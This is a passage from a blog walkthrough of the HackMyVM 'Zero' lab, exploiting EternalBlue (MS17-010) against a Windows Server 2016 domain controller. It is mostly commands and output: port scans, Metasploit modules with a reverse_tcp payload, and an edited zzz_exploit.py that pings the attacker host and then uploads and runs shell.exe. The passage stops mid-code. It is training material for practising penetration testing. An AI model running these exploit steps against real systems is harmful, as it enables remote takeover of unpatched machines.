{"id":779,"date":"2024-08-10T20:26:03","date_gmt":"2024-08-10T12:26:03","guid":{"rendered":"http:\/\/162.14.82.114\/?p=779"},"modified":"2024-08-10T20:26:03","modified_gmt":"2024-08-10T12:26:03","slug":"hmv-_-zero","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/779\/08\/10\/2024\/","title":{"rendered":"hmv[-_-]Zero"},"content":{"rendered":"<h1>Zero<\/h1>\n<blockquote>\n<p>An EternalBlue vulnerability lab where you have to modify how the exploit script is configured and run....<\/p>\n<\/blockquote>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408102025187.png\" alt=\"image-20240528145830774\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408102025189.png\" alt=\"image-20240810144730462\" style=\"zoom: 50%;\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scanning<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. 
\nOpen 192.168.10.100:53\nOpen 192.168.10.100:88\nOpen 192.168.10.100:135\nOpen 192.168.10.100:139\nOpen 192.168.10.100:389\nOpen 192.168.10.100:445\nOpen 192.168.10.100:464\nOpen 192.168.10.100:593\nOpen 192.168.10.100:636\nOpen 192.168.10.100:3268\nOpen 192.168.10.100:5985\nOpen 192.168.10.100:9389\nOpen 192.168.10.100:49667\nOpen 192.168.10.100:49668\nOpen 192.168.10.100:49669\nOpen 192.168.10.100:49670\nOpen 192.168.10.100:49685\nOpen 192.168.10.100:49710<\/code><\/pre>\n<h2>Exploitation<\/h2>\n<h3>Exploiting with msf scripts<\/h3>\n<p>There is no web service to test here, but the SMB service on port <code>445<\/code> is open, so we explore that first:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero]\n\u2514\u2500$ msfconsole -q\nmsf6 &gt; search ms17-010\n\nMatching Modules\n================\n\n   #   Name                                           Disclosure Date  Rank     Check  Description\n   -   ----                                           ---------------  ----     -----  -----------\n   0   exploit\/windows\/smb\/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption\n   1     \\_ target: Automatic Target                  .                .        .      .\n   2     \\_ target: Windows 7                         .                .        .      .\n   3     \\_ target: Windows Embedded Standard 7       .                .        .      .\n   4     \\_ target: Windows Server 2008 R2            .                .        .      .\n   5     \\_ target: Windows 8                         .                .        .      .\n   6     \\_ target: Windows 8.1                       .                .        .      .\n   7     \\_ target: Windows Server 2012               .                .        .      .\n   8     \\_ target: Windows 10 Pro                    .                .        .      
.\n   9     \\_ target: Windows 10 Enterprise Evaluation  .                .        .      .\n   10  exploit\/windows\/smb\/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Code Execution\n   11    \\_ target: Automatic                         .                .        .      .\n   12    \\_ target: PowerShell                        .                .        .      .\n   13    \\_ target: Native upload                     .                .        .      .\n   14    \\_ target: MOF upload                        .                .        .      .\n   15    \\_ AKA: ETERNALSYNERGY                       .                .        .      .\n   16    \\_ AKA: ETERNALROMANCE                       .                .        .      .\n   17    \\_ AKA: ETERNALCHAMPION                      .                .        .      .\n   18    \\_ AKA: ETERNALBLUE                          .                .        .      .\n   19  auxiliary\/admin\/smb\/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance\/EternalSynergy\/EternalChampion SMB Remote Windows Command Execution\n   20    \\_ AKA: ETERNALSYNERGY                       .                .        .      .\n   21    \\_ AKA: ETERNALROMANCE                       .                .        .      .\n   22    \\_ AKA: ETERNALCHAMPION                      .                .        .      .\n   23    \\_ AKA: ETERNALBLUE                          .                .        .      .\n   24  auxiliary\/scanner\/smb\/smb_ms17_010             .                normal   No     MS17-010 SMB RCE Detection\n   25    \\_ AKA: DOUBLEPULSAR                         .                .        .      .\n   26    \\_ AKA: ETERNALBLUE                          .                .        .      
.\n   27  exploit\/windows\/smb\/smb_doublepulsar_rce       2017-04-14       great    Yes    SMB DOUBLEPULSAR Remote Code Execution\n   28    \\_ target: Execute payload (x64)             .                .        .      .\n   29    \\_ target: Neutralize implant                .                .        .      .\n\nInteract with a module by name or index. For example info 29, use 29 or use exploit\/windows\/smb\/smb_doublepulsar_rce\nAfter interacting with a module you can manually set a TARGET with set TARGET &#039;Neutralize implant&#039;\n\nmsf6 &gt; use auxiliary\/scanner\/smb\/smb_ms17_010\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) &gt; show options\n\nModule options (auxiliary\/scanner\/smb\/smb_ms17_010):\n\n   Name         Current Setting                                            Required  Description\n   ----         ---------------                                            --------  -----------\n   CHECK_ARCH   true                                                       no        Check for architecture on vulnerable hosts\n   CHECK_DOPU   true                                                       no        Check for DOUBLEPULSAR on vulnerable hosts\n   CHECK_PIPE   false                                                      no        Check for named pipe on vulnerable hosts\n   NAMED_PIPES  \/usr\/share\/metasploit-framework\/data\/wordlists\/named_pipe  yes       List of named pipes to check\n                s.txt\n   RHOSTS                                                                  yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT        445                                                        yes       The SMB service port (TCP)\n   SMBDomain    .                                                          
no        The Windows domain to use for authentication\n   SMBPass                                                                 no        The password for the specified username\n   SMBUser                                                                 no        The username to authenticate as\n   THREADS      1                                                          yes       The number of concurrent threads (max one per host)\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) &gt; set rhosts 192.168.10.100\nrhosts =&gt; 192.168.10.100\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) &gt; run\n\n[+] 192.168.10.100:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)\n[*] 192.168.10.100:445    - Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\nmsf6 auxiliary(scanner\/smb\/smb_ms17_010) &gt; use exploit\/windows\/smb\/ms17_010_eternalblue\n[*] No payload configured, defaulting to windows\/x64\/meterpreter\/reverse_tcp\nmsf6 exploit(windows\/smb\/ms17_010_eternalblue) &gt; show options\n\nModule options (exploit\/windows\/smb\/ms17_010_eternalblue):\n\n   Name           Current Setting  Required  Description\n   ----           ---------------  --------  -----------\n   RHOSTS                          yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT          445              yes       The target port (TCP)\n   SMBDomain                       no        (Optional) The Windows domain to use for authentication. 
Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target ma\n                                             chines.\n   SMBPass                         no        (Optional) The password for the specified username\n   SMBUser                         no        (Optional) The username to authenticate as\n   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machin\n                                             es.\n   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.\n\nPayload options (windows\/x64\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  thread           yes       Exit technique (Accepted: &#039;&#039;, seh, thread, process, none)\n   LHOST     10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic Target\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(windows\/smb\/ms17_010_eternalblue) &gt; set rhosts 192.168.10.100\nrhosts =&gt; 192.168.10.100\nmsf6 exploit(windows\/smb\/ms17_010_eternalblue) &gt; set lhost 192.168.10.104\nlhost =&gt; 192.168.10.104\nmsf6 exploit(windows\/smb\/ms17_010_eternalblue) &gt; run\n\n[*] Started reverse TCP handler on 192.168.10.104:4444 \n[*] 192.168.10.100:445 - Using auxiliary\/scanner\/smb\/smb_ms17_010 as check\n[+] 192.168.10.100:445    - Host is likely VULNERABLE to MS17-010! 
- Windows Server 2016 Standard Evaluation 14393 x64 (64-bit)\n[*] 192.168.10.100:445    - Scanned 1 of 1 hosts (100% complete)\n[+] 192.168.10.100:445 - The target is vulnerable.\n[*] 192.168.10.100:445 - Connecting to target for exploitation.\n[+] 192.168.10.100:445 - Connection established for exploitation.\n[+] 192.168.10.100:445 - Target OS selected valid for OS indicated by SMB reply\n[*] 192.168.10.100:445 - CORE raw buffer dump (45 bytes)\n[*] 192.168.10.100:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2\n[*] 192.168.10.100:445 - 0x00000010  30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61  016 Standard Eva\n[*] 192.168.10.100:445 - 0x00000020  6c 75 61 74 69 6f 6e 20 31 34 33 39 33           luation 14393   \n[+] 192.168.10.100:445 - Target arch selected valid for arch indicated by DCE\/RPC reply\n[*] 192.168.10.100:445 - Trying exploit with 12 Groom Allocations.\n[*] 192.168.10.100:445 - Sending all but last fragment of exploit packet\n[*] 192.168.10.100:445 - Starting non-paged pool grooming\n[+] 192.168.10.100:445 - Sending SMBv2 buffers\n[+] 192.168.10.100:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.\n[*] 192.168.10.100:445 - Sending final SMBv2 buffers.\n[*] 192.168.10.100:445 - Sending last fragment of exploit packet!\n[*] 192.168.10.100:445 - Receiving response from exploit packet\n[+] 192.168.10.100:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!\n[*] 192.168.10.100:445 - Sending egg to corrupted connection.\n[*] 192.168.10.100:445 - Triggering free of corrupted buffer.\n[-] 192.168.10.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n[-] 192.168.10.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=FAIL-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n[-] 192.168.10.100:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=\n[*] 192.168.10.100:445 - Connecting to target for exploitation.\n[+] 192.168.10.100:445 - Connection established for exploitation.\n[+] 
192.168.10.100:445 - Target OS selected valid for OS indicated by SMB reply\n[*] 192.168.10.100:445 - CORE raw buffer dump (45 bytes)\n[*] 192.168.10.100:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2\n[*] 192.168.10.100:445 - 0x00000010  30 31 36 20 53 74 61 6e 64 61 72 64 20 45 76 61  016 Standard Eva\n[*] 192.168.10.100:445 - 0x00000020  6c 75 61 74 69 6f 6e 20 31 34 33 39 33           luation 14393   \n[+] 192.168.10.100:445 - Target arch selected valid for arch indicated by DCE\/RPC reply\n[*] 192.168.10.100:445 - Trying exploit with 17 Groom Allocations.\n[*] 192.168.10.100:445 - Sending all but last fragment of exploit packet\n^C[-] 192.168.10.100:445 - Exploit failed [user-interrupt]: Interrupt \n[-] run: Interrupted\nmsf6 exploit(windows\/smb\/ms17_010_eternalblue) &gt; use exploit\/windows\/smb\/ms17_010_psexec\n[*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\nmsf6 exploit(windows\/smb\/ms17_010_psexec) &gt; show options\n\nModule options (exploit\/windows\/smb\/ms17_010_psexec):\n\n   Name                  Current Setting                                       Required  Description\n   ----                  ---------------                                       --------  -----------\n   DBGTRACE              false                                                 yes       Show extra debug trace info\n   LEAKATTEMPTS          99                                                    yes       How many times to try to leak transaction\n   NAMEDPIPE                                                                   no        A named pipe that can be connected to (leave blank for auto)\n   NAMED_PIPES           \/usr\/share\/metasploit-framework\/data\/wordlists\/named  yes       List of named pipes to check\n                         _pipes.txt\n   RHOSTS                                                                      yes       The target host(s), see 
https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.\n                                                                                         html\n   RPORT                 445                                                   yes       The Target port (TCP)\n   SERVICE_DESCRIPTION                                                         no        Service description to be used on target for pretty listing\n   SERVICE_DISPLAY_NAME                                                        no        The service display name\n   SERVICE_NAME                                                                no        The service name\n   SHARE                 ADMIN$                                                yes       The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read\/write folder share\n   SMBDomain             .                                                     no        The Windows domain to use for authentication\n   SMBPass                                                                     no        The password for the specified username\n   SMBUser                                                                     no        The username to authenticate as\n\nPayload options (windows\/meterpreter\/reverse_tcp):\n\n   Name      Current Setting  Required  Description\n   ----      ---------------  --------  -----------\n   EXITFUNC  thread           yes       Exit technique (Accepted: &#039;&#039;, seh, thread, process, none)\n   LHOST     10.0.2.4         yes       The listen address (an interface may be specified)\n   LPORT     4444             yes       The listen port\n\nExploit target:\n\n   Id  Name\n   --  ----\n   0   Automatic\n\nView the full module info with the info, or info -d command.\n\nmsf6 exploit(windows\/smb\/ms17_010_psexec) &gt; set rhosts 192.168.10.100\nrhosts =&gt; 192.168.10.100\nmsf6 exploit(windows\/smb\/ms17_010_psexec) &gt; set lhost 192.168.10.104\nlhost =&gt; 
192.168.10.104\nmsf6 exploit(windows\/smb\/ms17_010_psexec) &gt; run\n\n[*] Started reverse TCP handler on 192.168.10.104:4444 \n[*] 192.168.10.100:445 - Target OS: Windows Server 2016 Standard Evaluation 14393\n[*] 192.168.10.100:445 - Built a write-what-where primitive...\n[+] 192.168.10.100:445 - Overwrite complete... SYSTEM session obtained!\n[*] 192.168.10.100:445 - Selecting PowerShell target\n[*] 192.168.10.100:445 - Executing the payload...\n[+] 192.168.10.100:445 - Service start timed out, OK if running a command or non-service executable...\n[*] Exploit completed, but no session was created.<\/code><\/pre>\n<p>Rescan to check the relevant configuration of the target:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/AutoBlue-MS17-010]\n\u2514\u2500$ nmap -Pn $IP 445 -sC -sV -sT -T4 \nStarting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-08-10 04:17 EDT\nNmap scan report for 192.168.10.100\nHost is up (0.0034s latency).\nNot shown: 989 filtered tcp ports (no-response)\nPORT     STATE SERVICE      VERSION\n53\/tcp   open  domain       Simple DNS Plus\n88\/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2024-08-10 23:18:01Z)\n135\/tcp  open  msrpc        Microsoft Windows RPC\n139\/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn\n389\/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Default-First-Site-Name)\n445\/tcp  open  microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: ZERO)\n464\/tcp  open  kpasswd5?\n593\/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0\n636\/tcp  open  tcpwrapped\n3268\/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: zero.hmv, Site: Default-First-Site-Name)\n3269\/tcp open  tcpwrapped\nService Info: Host: DC01; OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled and 
required\n| smb-os-discovery: \n|   OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)\n|   Computer name: DC01\n|   NetBIOS computer name: DC01\\x00\n|   Domain name: zero.hmv\n|   Forest name: zero.hmv\n|   FQDN: DC01.zero.hmv\n|_  System time: 2024-08-10T16:18:02-07:00\n|_clock-skew: mean: 17h20m01s, deviation: 4h02m29s, median: 15h00m00s\n| smb2-time: \n|   date: 2024-08-10T23:18:02\n|_  start_date: 2024-08-10T21:41:37\n| smb-security-mode: \n|   account_used: &lt;blank&gt;\n|   authentication_level: user\n|   challenge_response: supported\n|_  message_signing: required\n|_nbstat: NetBIOS name: DC01, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:15:ea:1c (Oracle VirtualBox virtual NIC)\n\nNmap scan report for 445 (0.0.1.189)\nHost is up.\nAll 1000 scanned ports on 445 (0.0.1.189) are in ignored states.\nNot shown: 1000 filtered tcp ports (no-response)\n\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 2 IP addresses (2 hosts up) scanned in 67.52 seconds<\/code><\/pre>\n<p>It turns out the host has a domain name. I changed the relevant settings and ran the exploit again, but it still fails... so let us try other scripts from the internet:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202408102025190.png\" alt=\"image-20240810172537213\" style=\"zoom:50%;\" \/><\/p>\n<p><a href=\"https:\/\/github.com\/3ndG4me\/AutoBlue-MS17-010\">https:\/\/github.com\/3ndG4me\/AutoBlue-MS17-010<\/a><\/p>\n
<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/AutoBlue-MS17-010]\n\u2514\u2500$ ls -la\ntotal 200\ndrwxr-xr-x 4 kali kali  4096 Aug 10 04:16 .\ndrwxr-xr-x 3 kali kali  4096 Aug 10 04:07 ..\n-rwxr-xr-x 1 kali kali 26444 Aug 10 04:07 eternalblue_exploit10.py\n-rwxr-xr-x 1 kali kali 25741 Aug 10 04:07 eternalblue_exploit7.py\n-rwxr-xr-x 1 kali kali 24106 Aug 10 04:07 eternalblue_exploit8.py\n-rwxr-xr-x 1 kali kali  2801 Aug 10 04:07 eternal_checker.py\n-rwxr-xr-x 1 kali kali  1070 Aug 10 04:07 LICENSE\n-rwxr-xr-x 1 kali kali  3640 Aug 10 04:07 listener_prep.sh\n-rwxr-xr-x 1 kali kali 25943 Aug 10 04:07 mysmb.py\ndrwxr-xr-x 2 kali kali  4096 Aug 10 04:07 __pycache__\n-rwxr-xr-x 1 kali kali  5352 Aug 10 04:07 README.md\n-rwxr-xr-x 1 kali kali     8 Aug 10 04:07 requirements.txt\ndrwxr-xr-x 2 kali kali  4096 Aug 10 04:13 shellcode\n-rwxr-xr-x 1 kali kali 49249 Aug 10 04:07 zzz_exploit.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/AutoBlue-MS17-010]\n\u2514\u2500$ python3 eternal_checker.py 192.168.10.100\n[*] Target OS: Windows Server 2016 Standard Evaluation 14393\n[!] 
The target is not patched\n=== Testing named pipes ===\n[+] Found pipe &#039;netlogon&#039;\n[+] Found pipe &#039;lsarpc&#039;\n[+] Found pipe &#039;samr&#039;\n[*] Done<\/code><\/pre>\n<p>I then followed <code>README.md<\/code> for the remaining steps, but no shell came back, and I could not tell where it went wrong.<\/p>\n<h3>Exploiting with a modified script<\/h3>\n<p>I have done few Windows boxes, so I can only follow the writeup: it points to the upstream repository this library was derived from, so let us look there: <a href=\"https:\/\/github.com\/worawit\/MS17-010\">https:\/\/github.com\/worawit\/MS17-010<\/a><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ python2 checker.py 192.168.10.100\nTraceback (most recent call last):\n  File &quot;checker.py&quot;, line 1, in &lt;module&gt;\n    from mysmb import MYSMB\n  File &quot;\/home\/kali\/temp\/zero\/MS17-010\/mysmb.py&quot;, line 3, in &lt;module&gt;\n    from impacket import smb, smbconnection\nImportError: No module named impacket\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ python2 -m pip install impacket==0.9.20\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ python2 checker.py 192.168.10.100      \nTarget OS: Windows Server 2016 Standard Evaluation 14393\nThe target is not patched\n\n=== Testing named pipes ===\nspoolss: STATUS_ACCESS_DENIED\nsamr: Ok (64 bit)\nnetlogon: Ok (64 bit)\nlsarpc: Ok (64 bit)\nbrowser: STATUS_ACCESS_DENIED<\/code><\/pre>\n<p>Modify the tell-tale parts of the script and try to exploit. The original <code>smb_pwn<\/code> function:<\/p>\n<pre><code class=\"language-python\">def smb_pwn(conn, arch):\n        smbConn = conn.get_smbconnection()\n\n        print(&#039;creating file c:\\\\pwned.txt on the target&#039;)\n        tid2 = 
smbConn.connectTree(&#039;C$&#039;)\n        fid2 = smbConn.createFile(tid2, &#039;\/pwned.txt&#039;)\n        smbConn.closeFile(tid2, fid2)\n        smbConn.disconnectTree(tid2)\n\n        #smb_send_file(smbConn, sys.argv[0], &#039;C&#039;, &#039;\/exploit.py&#039;)\n        #service_exec(conn, r&#039;cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt&#039;)\n        # Note: there are many methods to get shell over SMB admin session\n        # a simple method to get shell (but easily to be detected by AV) is\n        # executing binary generated by &quot;msfvenom -f exe-service ...&quot;<\/code><\/pre>\n<p>Changed to:<\/p>\n<pre><code class=\"language-python\">def smb_pwn(conn, arch):\n        # smbConn = conn.get_smbconnection()\n\n        # print(&#039;creating file c:\\\\pwned.txt on the target&#039;)\n        # tid2 = smbConn.connectTree(&#039;C$&#039;)\n        # fid2 = smbConn.createFile(tid2, &#039;\/pwned.txt&#039;)\n        # smbConn.closeFile(tid2, fid2)\n        # smbConn.disconnectTree(tid2)\n\n        # smb_send_file(smbConn, sys.argv[0], &#039;C&#039;, &#039;\/exploit.py&#039;)\n        #service_exec(conn, r&#039;cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt&#039;)\n        service_exec(conn, r&#039;cmd \/c ping 192.168.10.104&#039;)\n        # Note: there are many methods to get shell over SMB admin session\n        # a simple method to get shell (but easily to be detected by AV) is\n        # executing binary generated by &quot;msfvenom -f exe-service ...&quot;<\/code><\/pre>\n<p>Run it and check whether the ping arrives:<\/p>\n<pre><code class=\"language-bash\"># kali1\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ cp zzz_exploit.py zzz_exploit_change.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ vim zzz_exploit_change.py\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ chmod +x 
*\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero\/MS17-010]\n\u2514\u2500$ python2 zzz_exploit_change.py 192.168.10.100\nTarget OS: Windows Server 2016 Standard Evaluation 14393\nUsing named pipe: netlogon\nTarget is 64 bit\nGot frag size: 0x20\nGROOM_POOL_SIZE: 0x5030\nBRIDE_TRANS_SIZE: 0xf90\nCONNECTION: 0xffffc407182b8910\nSESSION: 0xffffb406737d6450\nFLINK: 0xffffb406750a2098\nInParam: 0xffffb4067509616c\nMID: 0x2903\nunexpected alignment, diff: 0xb098\nleak failed... try again\nCONNECTION: 0xffffc407182b8910\nSESSION: 0xffffb406737d6450\nFLINK: 0xffffb406750b1098\nInParam: 0xffffb406750ab16c\nMID: 0x2903\nsuccess controlling groom transaction\nmodify trans1 struct for arbitrary read\/write\nmake this SMB session to be SYSTEM\noverwriting session security context\nOpening SVCManager on 192.168.10.100.....\nCreating service gFLX.....\nStarting service gFLX.....\nSCMR SessionError: code: 0x41d - ERROR_SERVICE_REQUEST_TIMEOUT - The service did not respond to the start or control request in a timely fashion.\nRemoving service gFLX.....\nDone\n\n# kali2\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/zero]\n\u2514\u2500$ sudo tcpdump -i eth1 host 192.168.10.100\n[sudo] password for kali: \ntcpdump: verbose output suppressed, use -v[v]... 
for full protocol decode\nlistening on eth1, link-type EN10MB (Ethernet), snapshot length 262144 bytes\n06:17:05.809879 IP 192.168.10.100 &gt; 224.0.0.252: igmp v2 report 224.0.0.252\n06:17:06.321587 IP 192.168.10.100 &gt; 224.0.0.251: igmp v2 report 224.0.0.251\n06:17:15.222515 IP 192.168.10.104.34468 &gt; 192.168.10.100.microsoft-ds: Flags [S], seq 2544194393, win 32120, options [mss 1460,sackOK,TS val 3299061392 ecr 0,nop,wscale 7], length 0\n06:17:15.223170 IP 192.168.10.100.microsoft-ds &gt; 192.168.10.104.34468: Flags [S.], seq 2916466824, ack 2544194394, win 8192, options [mss 1460,nop,wscale 8,sackOK,TS val 6384526 ecr 3299061392], length 0\n06:17:15.223189 IP 192.168.10.104.34468 &gt; 192.168.10.100.microsoft-ds: Flags [.], ack 1, win 251, options [nop,nop,TS val 3299061393 ecr 6384526], length 0\n06:17:15.223537 IP 192.168.10.104.34468 &gt; 192.168.10.100.microsoft-ds: Flags [P.], seq 1:52, ack 1, win 251, options [nop,nop,TS val 3299061393 ecr 6384526], length 51\n06:17:15.224395 IP 192.168.10.100.microsoft-ds &gt; 192.168.10.104.34468: Flags [P.], seq 1:210, ack 52, win 2081, options [nop,nop,TS val 6384527 ecr 3299061393], length 209\n06:17:15.224409 IP 192.168.10.104.34468 &gt; 192.168.10.100.microsoft-ds: Flags [.], ack 210, win 250, options [nop,nop,TS val 3299061394 ecr 6384527], length 0\n06:17:15.225756 IP 192.168.10.104.34468 &gt; 192.168.10.100.microsoft-ds: Flags [P.], seq 52:192, ack 210, win 250, options [nop,nop,TS val 3299061395 ecr 6384527], length 140\n06:17:15.226811 IP 192.168.10.100.microsoft-ds &gt; 192.168.10.104.34468: Flags [P.], seq 210:552, ack 192, win 2080, options [nop,nop,TS val 6384529 ecr 3299061395], length 342\n06:17:15.229722 IP 192.168.10.104.34468 &gt; 192.168.10.100.microsoft-ds: Flags [P.], seq 192:355, ack 552, win 249, options [nop,nop,TS val 3299061399 ecr 6384529], length 163\n06:17:15.231001 IP 192.168.10.100.microsoft-ds &gt; 192.168.10.104.34468: Flags [P.], seq 552:698, ack 355, win 2080, options [nop,nop,TS 
val 6384533 ecr 3299061399], length 146\n06:17:15.232466 IP 192.168.10.104.34468 &gt; 192.168.10.100.microsoft-ds: Flags [P.], seq 355:431, ack 698, win 249, options [nop,nop,TS val 3299061402 ecr 6384533], length 76\n06:17:15.233213 IP 192.168.10.100.microsoft-ds &gt; 192.168.10.104.34468: Flags [P.], seq 698:748, ack 431, win 2080, options [nop,nop,TS val 6384536 ecr 3299061402], length 50\n06:17:15.234234 IP 192.168.10.104.34468 &gt; 192.168.10.100.microsoft-ds: Flags [P.], seq 431:526, ack 748, win 249, options [nop,nop,TS val 3299061404 ecr 6384536], length 95\n06:17:15.234880 IP 192.168.10.100.microsoft-ds &gt; 192.168.10.104.34468: Flags [P.], seq 748:787, ack 526, win 2079, options [nop,nop,TS val 6384537 ecr 3299061404], length 39\n06:17:15.236117 IP 192.168.10.104.34468 &gt; 192.168.10.100.microsoft-ds: Flags [P.], seq 526:621, ack 787, win 249, options [nop,nop,TS val 3299061405 ecr 6384537], length 95\n................<\/code><\/pre>\n<p>This shows that commands execute normally, so modify the script to get a reverse shell.<\/p>\n<pre><code class=\"language-python\">def smb_pwn(conn, arch):\n        smbConn = conn.get_smbconnection()\n\n        # print(&#039;creating file c:\\\\pwned.txt on the target&#039;)\n        # tid2 = smbConn.connectTree(&#039;C$&#039;)\n        # fid2 = smbConn.createFile(tid2, &#039;\/pwned.txt&#039;)\n        # smbConn.closeFile(tid2, fid2)\n        # smbConn.disconnectTree(tid2)\n\n        smb_send_file(smbConn, &#039;shell.exe&#039;, &#039;C&#039;, &#039;\/system.exe&#039;) \n        #service_exec(conn, r&#039;cmd \/c copy c:\\pwned.txt c:\\pwned_exec.txt&#039;)\n        service_exec(conn, r&#039;cmd \/c c:\\\\system.exe&#039;)\n        # Note: there are many methods to get shell over SMB admin session\n        # a simple method to get shell (but easily to be detected by AV) is\n        # executing binary generated by &quot;msfvenom -f exe-service 
